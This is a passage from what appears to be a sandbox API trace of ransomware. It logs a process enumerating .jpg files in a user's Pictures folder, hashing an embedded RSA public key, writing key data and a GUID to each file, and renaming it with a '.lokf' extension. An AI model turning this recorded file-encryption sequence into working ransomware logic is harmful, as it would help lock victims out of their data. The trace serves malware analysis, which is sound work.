nFileSizeLow=0x13a8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eE0Pj7G5aEffKAC-zZKZ.jpg", cAlternateFileName="EE0PJ7~1.JPG")) returned 1 [0059.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.105] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eE0Pj7G5aEffKAC-zZKZ.jpg") returned=".jpg" [0059.105] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eE0Pj7G5aEffKAC-zZKZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ee0pj7g5aeffkac-zzkz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.105] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=80526) returned 1 [0059.105] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.107] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13a68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.108] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.108] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.108] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.108] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x13a8e, lpOverlapped=0x0) returned 1 [0059.109] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.109] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.109] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.109] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0059.110] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.110] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.110] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.110] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.110] GetLastError () returned 0x0 [0059.110] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.110] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0059.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.110] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.110] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.110] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x13a90) returned 0x9c83710 [0059.110] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.110] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c831d8 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3e8 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83220 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b400 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b430 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b448 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.111] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b430 | out: hHeap=0x660000) returned 1 [0059.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b448 | out: hHeap=0x660000) returned 1 [0059.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b448 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b430 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b448 | out: hHeap=0x660000) returned 1 [0059.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b430 | out: hHeap=0x660000) returned 1 [0059.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.111] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.112] GetCurrentThreadId () returned 0x9e0 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7dbf8 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.112] GetCurrentThreadId () returned 0x9e0 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.112] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.113] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13a8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.113] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.113] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.113] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.113] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.113] CloseHandle (hObject=0x5cc) returned 1 [0059.114] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eE0Pj7G5aEffKAC-zZKZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ee0pj7g5aeffkac-zzkz.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eE0Pj7G5aEffKAC-zZKZ.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ee0pj7g5aeffkac-zzkz.jpg.lokf")) returned 1 [0059.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.115] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.116] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd90fef10, ftCreationTime.dwHighDateTime=0x1d4d30e, ftLastAccessTime.dwLowDateTime=0x6db0c130, ftLastAccessTime.dwHighDateTime=0x1d4c5e5, ftLastWriteTime.dwLowDateTime=0x6db0c130, ftLastWriteTime.dwHighDateTime=0x1d4c5e5, nFileSizeHigh=0x0, nFileSizeLow=0xd2f1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EOWcS-b-pHU1wro7.jpg", cAlternateFileName="EOWCS-~1.JPG")) returned 1 [0059.116] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EOWcS-b-pHU1wro7.jpg") returned=".jpg" [0059.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EOWcS-b-pHU1wro7.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eowcs-b-phu1wro7.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.116] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=54001) returned 1 [0059.116] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.118] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd2cb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.118] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.119] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xd2f1, lpOverlapped=0x0) returned 1 [0059.119] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.119] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.119] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.119] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0059.120] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.120] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.120] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.120] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.120] GetLastError () returned 0x0 [0059.120] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.120] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0059.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.120] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.120] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.120] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.120] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.121] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b448 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b460 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b460 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b448 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b460 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b448 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.121] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.122] GetCurrentThreadId () returned 0x9e0 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7dc88 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.122] GetCurrentThreadId () returned 0x9e0 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.122] RtlAllocateHeap 